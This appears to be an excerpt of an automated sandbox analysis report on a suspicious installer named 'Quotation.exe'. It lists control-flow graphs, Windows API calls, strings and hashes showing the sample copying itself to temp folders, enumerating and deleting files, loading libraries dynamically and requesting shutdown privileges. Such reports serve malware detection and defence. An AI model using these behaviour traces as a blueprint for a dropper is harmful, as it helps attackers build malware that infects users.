3243->3241 3245 73c6201c 3244->3245 3246 73c617a4 3244->3246 3245->3246 3247 73c62033 GlobalFree 3245->3247 3246->3158 3246->3159 3247->3245 3249 73c615eb 2 API calls 3248->3249 3250 73c615e6 3249->3250 3250->3152 3251->3163 3252->3185 3253->3185 3261 73c612f8 GlobalAlloc 3254->3261 3256 73c612f0 lstrcpynW 3256->3185 3258 73c61327 3257->3258 3258->3190 3259->3180 3260->3183 3261->3256 3263 73c61555 3262->3263 3264 73c612f8 GlobalAlloc 3262->3264 3265 73c612e1 2 API calls 3263->3265 3264->3194 3266 73c6156a 3265->3266 3266->3194 3268 73c619ea VirtualAlloc 3267->3268 3269 73c61a48 3267->3269 3268->3269 3269->3194 3271 73c62ccd GetLastError 3270->3271 3272 73c62cd8 3270->3272 3271->3272 3272->3130 3273->3228 3275 73c61663 3274->3275 3276 73c6163f 3274->3276 3275->3228 3276->3275 3277 73c61648 lstrcpyW 3276->3277 3277->3275 3278->3233 3350 73c6103a 3351 73c61052 3350->3351 3352 73c610c5 3351->3352 3353 73c61081 3351->3353 3354 73c61061 3351->3354 3356 73c6156c GlobalFree 3353->3356 3355 73c6156c GlobalFree 3354->3355 3357 73c61072 3355->3357 3361 73c61079 3356->3361 3358 73c6156c GlobalFree 3357->3358 3358->3361 3359 73c61091 GlobalSize 3360 73c6109a 3359->3360 3362 73c610af 3360->3362 3363 73c6109e GlobalAlloc 3360->3363 3361->3359 3361->3360 3365 73c610b8 GlobalFree 3362->3365 3364 73c615c5 3 API calls 3363->3364 3364->3362 3365->3352

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4036da-403723 SetErrorMode GetVersionExW 1 403725-403745 GetVersionExW 0->1 2 40375c 0->2 3 403747-40374b 1->3 4 403758-40375a 1->4 5 403763-403768 2->5 6 40374e-403756 3->6 4->6 7 403775 5->7 8 40376a-403773 5->8 6->5 9 403779-4037bb 7->9 8->9 10 4037bd-4037c5 call 4068c4 9->10 11 4037ce 9->11 10->11 16 4037c7 10->16 13 4037d3-4037e5 call 40617c lstrlenA 11->13 18 4037e7-403803 call 4068c4 * 3 13->18 16->11 25 403814-4038ad #17 OleInitialize SHGetFileInfoW call 406af8 GetCommandLineW call 406af8 call 4065d4 CharNextW 18->25 26 403805-40380b 18->26 35 4038b3 25->35 36 403988-4039a2 GetTempPathW call 403c83 25->36 26->25 30 40380d 26->30 30->25 38 4038b5-4038bb 35->38 44 4039a4-4039c2 GetWindowsDirectoryW lstrcatW call 403c83 36->44 45 4039fa-403a13 DeleteFileW call 4033cb 36->45 40 4038c8-4038d3 38->40 41 4038bd-4038c6 38->41 42 4038d5-4038dc 40->42 43 4038de-4038ed 40->43 41->40 41->41 42->43 46 403948-40395c call 4065d4 43->46 47 4038ef-4038fb 43->47 44->45 61 4039c4-4039f4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c83 44->61 55 403bc4 45->55 56 403a19-403a1f 45->56 63 403964-40396a 46->63 64 40395e-403961 46->64 51 403915-40391b 47->51 52 4038fd-403904 47->52 59 403937-40393e 51->59 60 40391d-403924 51->60 57 403906-403909 52->57 58 40390b 52->58 67 403bc8-403bd5 call 4036b0 OleUninitialize 55->67 65 403a21-403a33 call 4065d4 56->65 66 403a84-403a8b call 405a1c 56->66 57->51 57->58 58->51 59->46 69 403940-403946 59->69 60->59 68 403926-40392d 60->68 61->45 83 403bc2 61->83 63->36 71 40396c-40396f 63->71 64->63 84 403a49-403a4b 65->84 80 403a90-403a92 66->80 85 403bd7-403be2 call 406a86 67->85 86 403bea-403bf1 67->86 75 403934 68->75 76 40392f-403932 68->76 69->46 77 403974-403983 call 406af8 69->77 71->38 75->59 76->59 76->75 77->36 80->67 83->55 89 403a35-403a3b 84->89 90 403a4d-403a54 84->90 98 403be4 ExitProcess 85->98 87 403bf3-403c09 GetCurrentProcess OpenProcessToken 86->87 88 403c6f-403c7e 86->88 92 403c0b-403c39 LookupPrivilegeValueW AdjustTokenPrivileges 87->92 93 403c3f-403c4d call 4068c4 87->93 88->98 94 403a46 89->94 95 403a3d-403a44 89->95 96 403a56-403a66 call 406616 90->96 97 403a97-403aaf call 4064da lstrcatW 90->97 92->93 106 403c5b-403c66 ExitWindowsEx 93->106 107 403c4f-403c59 93->107 94->84 95->90 95->94 110 403a6c-403a82 call 406af8 * 2 96->110 111 403bbe-403bc0 96->111 108 403ac0-403ae1 lstrcatW lstrcmpiW 97->108 109 403ab1-403abb lstrcatW 97->109 106->88 112 403c68-403c6a call 401533 106->112 107->106 107->112 108->111 113 403ae7-403aee 108->113 109->108 110->66 111->67 112->88 117 403af0-403af5 call 405e1c 113->117 118 403af7 call 405dfc 113->118 123 403afc-403b0e SetCurrentDirectoryW 117->123 118->123 126 403b10-403b1a call 406af8 123->126 127 403b1f-403b39 call 406af8 123->127 126->127 131 403b3a-403b58 call 405e98 DeleteFileW 127->131 134 403ba7-403bb1 131->134 135 403b5a-403b6e CopyFileW 131->135 134->131 136 403bb3-403bb9 call 40621b 134->136 135->134 137 403b70-403b95 call 40621b call 405e98 call 4066b4 135->137 136->111 144 403b9a-403b9c 137->144 144->134 145 403b9e-403ba5 CloseHandle 144->145 145->134
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004036F6
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00403732
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
                                                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040381B
                                                                                              • SHGetFileInfoW.SHELL32(004085B0,00000000,?,?,00000000), ref: 0040383A
                                                                                              • GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Quotation.exe",?,"C:\Users\user\Desktop\Quotation.exe",00000000), ref: 0040389B
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 00403999
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004039AA
                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004039B6
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004039CA
                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004039D2
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004039E3
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 004039EB
                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403A05
                                                                                                • Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
                                                                                                • Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403AA8
                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00408600,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403ABB
                                                                                              • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403ACA
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quotation.exe",00000000,00000000), ref: 00403AD9
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403B01
                                                                                              • DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,0079F200,00000001), ref: 00403B66
                                                                                              • CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F
                                                                                                • Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user~1\AppData\Local\Temp\,00403CA7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00405E04
                                                                                                • Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E
                                                                                              • OleUninitialize.OLE32(00000000), ref: 00403BCD
                                                                                              • ExitProcess.KERNEL32 ref: 00403BE4
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00403BFA
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E
                                                                                                • Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,"C:\Users\user\Desktop\Quotation.exe",?,"C:\Users\user\Desktop\Quotation.exe",00000000), ref: 004065EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\overlays\besvangredes$C:\Users\user\overlays\besvangredes$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 1152188737-1575449900
                                                                                              • Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                              • Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
                                                                                              • Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                              • Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E
                                                                                              APIs
                                                                                                • Part of subcall function 73C612F8: GlobalAlloc.KERNEL32(?,?,73C611C4,-000000A0), ref: 73C61302
                                                                                              • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 73C6294E
                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 73C629A4
                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 73C629AF
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C629C0
                                                                                              • GlobalFree.KERNEL32(?), ref: 73C62A44
                                                                                              • GlobalFree.KERNEL32(?), ref: 73C62A4A
                                                                                              • GlobalFree.KERNEL32(?), ref: 73C62A50
                                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 73C62B1A
                                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 73C62B2B
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 73C62B82
                                                                                              • lstrlenW.KERNEL32(00000808), ref: 73C62B9D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1042148487-0
                                                                                              • Opcode ID: 27b04ae62ed280eb3b0557ead910998dbf45dc79cbb829e6595a2bd03879bef6
                                                                                              • Instruction ID: cdd890db31508e7a8eeb44504a1a68a91414330e3841cd503b5c2a4143c4c23e
                                                                                              • Opcode Fuzzy Hash: 27b04ae62ed280eb3b0557ead910998dbf45dc79cbb829e6595a2bd03879bef6
                                                                                              • Instruction Fuzzy Hash: AE42BF72A0830ADFD315CF25C8D476AB7F5FB88311F054A2EE59ADA284EB70D5448B93

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 866 4066f7-406720 call 406616 869 406722-406734 DeleteFileW 866->869 870 406739-406743 866->870 871 4068b8-4068c1 869->871 872 406745-406747 870->872 873 406756-406769 call 406af8 870->873 875 4068a7-4068ad 872->875 876 40674d-406750 872->876 880 406779-40677a call 406cee 873->880 881 40676b-406777 lstrcatW 873->881 879 4068b7 875->879 876->873 877 406870-406878 call 4065ad 876->877 877->879 888 40687a-40688e call 406534 call 406563 877->888 879->871 883 40677f-406784 880->883 881->883 886 406790-406796 lstrcatW 883->886 887 406786-40678e 883->887 889 406798-4067bb lstrlenW FindFirstFileW 886->889 887->886 887->889 903 406890-406892 888->903 904 4068af-4068b2 call 405d18 888->904 891 4067c1-4067c3 889->891 892 406859-40685e 889->892 895 4067c4-4067c9 891->895 892->879 894 406860-40686e 892->894 894->875 894->877 897 4067e2-4067f5 call 406af8 895->897 898 4067cb-4067d1 895->898 911 4067f7-4067fe 897->911 912 406809-406812 call 406563 897->912 901 4067d3-4067d8 898->901 902 40683b-40684c FindNextFileW 898->902 901->897 908 4067da-4067e0 901->908 902->895 906 406852-406853 FindClose 902->906 903->875 909 406894-4068a5 call 405d18 call 40621b 903->909 904->879 906->892 908->897 908->902 909->879 911->902 914 406800-406802 call 4066f7 911->914 921 406833-406836 call 405d18 912->921 922 406814-406816 912->922 920 406807 914->920 920->902 921->902 924 406818-406829 call 405d18 call 40621b 922->924 925 40682b-406831 922->925 924->902 925->902
                                                                                              APIs
                                                                                                • Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,771B3420,?), ref: 0040666A
                                                                                                • Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                              • DeleteFileW.KERNELBASE(?,?,00000000,771B3420,?), ref: 00406723
                                                                                              • lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,771B3420,?), ref: 00406775
                                                                                              • lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,771B3420,?), ref: 00406796
                                                                                              • lstrlenW.KERNEL32(?), ref: 00406799
                                                                                              • FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
                                                                                              • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
                                                                                              • FindClose.KERNEL32(00000000), ref: 00406853
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2636146433-1173974218
                                                                                              • Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                              • Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
                                                                                              • Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                              • Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 946 403148-403181 947 403190-4031a4 call 406926 946->947 948 403183-40318b call 403131 946->948 952 403357 947->952 953 4031aa-4031b0 947->953 948->947 956 403359 952->956 954 4031b6-4031e0 GetTickCount 953->954 955 4032f9-4032fb 953->955 957 4032f1-4032f3 954->957 958 4031e6-4031fd call 40311b 954->958 959 403340-403355 call 40311b 955->959 960 4032fd-4032ff 955->960 961 40335a-403364 956->961 957->961 958->952 968 403203-403211 958->968 959->952 959->957 960->957 964 403301 960->964 967 403306-403316 call 40311b 964->967 967->952 972 403318-403328 call 4069e9 967->972 970 40321b-403237 call 406e86 968->970 977 4032f5-4032f7 970->977 978 40323d-40325d GetTickCount 970->978 979 40332a-403338 972->979 980 40333c-40333e 972->980 977->956 981 4032aa-4032b0 978->981 982 40325f-403268 978->982 979->967 983 40333a 979->983 980->956 986 4032b2-4032b4 981->986 987 4032e9-4032eb 981->987 984 40326a-40326c 982->984 985 40326e-4032a6 MulDiv wsprintfW call 405d18 982->985 983->957 984->981 984->985 985->981 988 4032b6-4032bf call 4069e9 986->988 989 4032ce-4032d6 986->989 987->957 987->958 994 4032c4-4032c6 988->994 992 4032da-4032e1 989->992 992->970 995 4032e7 992->995 994->980 996 4032c8-4032cc 994->996 995->957 996->992
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004031B6
                                                                                              • GetTickCount.KERNEL32 ref: 00403248
                                                                                              • MulDiv.KERNEL32(?,?,?), ref: 00403278
                                                                                              • wsprintfW.USER32 ref: 00403289
                                                                                                • Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$FilePointerwsprintf
                                                                                              • String ID: ... %d%%$<Py
                                                                                              • API String ID: 999035486-2352372732
                                                                                              • Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                              • Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
                                                                                              • Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                              • Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                              • FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                              • Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
                                                                                              • Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                              • Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 146 404f70-404f89 147 405111-405123 146->147 148 404f8f-404f95 146->148 150 405125-405165 GetDlgItem * 2 call 4054f8 SetClassLongW call 401533 147->150 151 40516b-40517f 147->151 148->147 149 404f9b-404f9e 148->149 154 404fa0-404fb5 SetWindowPos 149->154 155 404fba-404fbd 149->155 150->151 152 405181-405183 151->152 153 4051bd-4051c2 call 4054c6 151->153 157 4051b5-4051b7 152->157 158 405185-405190 call 401399 152->158 167 4051c7-4051e6 153->167 159 4050fd 154->159 161 40500d-405013 155->161 162 404fbf-404fde ShowWindow 155->162 157->153 165 405488 157->165 158->157 183 405192-4051b0 SendMessageW 158->183 166 405101-40510c call 405739 159->166 169 405015-40502a DestroyWindow 161->169 170 40502f-405032 161->170 162->166 168 404fe4-404ffa GetWindowLongW 162->168 180 40548a-405491 165->180 166->180 174 4051e8-4051f3 call 401533 167->174 175 4051f9-4051ff 167->175 168->166 176 405000-405008 ShowWindow 168->176 177 40546c-405473 169->177 178 405034-405042 SetWindowLongW 170->178 179 405047-40504d 170->179 174->175 187 405205-405207 175->187 188 405448-405461 DestroyWindow EndDialog 175->188 176->166 177->165 186 405475-405477 177->186 178->180 179->159 182 405053-40506d GetDlgItem 179->182 189 405092-405097 182->189 190 40506f-405088 SendMessageW IsWindowEnabled 182->190 183->180 186->165 193 405479-405482 ShowWindow 186->193 187->188 194 40520d-405264 call 405e98 call 4054f8 * 3 GetDlgItem 187->194 191 405467 188->191 197 405099-40509a 189->197 198 40509c-40509f 189->198 190->165 196 40508e 190->196 191->177 193->165 222 405272-4052c1 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 194->222 223 405266-40526e 194->223 196->189 200 4050dd-4050e2 call 405936 197->200 201 4050a1-4050a8 198->201 202 4050ae-4050b1 198->202 200->166 205 4050e4-4050f7 SendMessageW 201->205 206 4050aa-4050ac 201->206 202->205 207 4050b3-4050ba 202->207 205->159 206->200 210 4050ca-4050d3 call 401533 207->210 211 4050bc-4050c8 call 401533 207->211 210->166 218 4050d5 210->218 220 4050db 211->220 218->220 220->200 224 4052c3-4052c4 222->224 225 4052c6 222->225 223->222 226 4052c7-4052f2 GetSystemMenu EnableMenuItem SendMessageW 224->226 225->226 227 4052f4-405309 SendMessageW 226->227 228 40530b 226->228 229 405311-405357 call 4054e1 call 405cf9 call 406af8 lstrlenW call 405e98 SetWindowTextW call 401399 227->229 228->229 229->167 240 40535d-40535f 229->240 240->167 241 405365-405369 240->241 242 405388-40539c DestroyWindow 241->242 243 40536b-405371 241->243 242->191 244 4053a2-4053cf CreateDialogParamW 242->244 243->165 245 405377-40537d 243->245 244->177 246 4053d5-40542c call 4054f8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 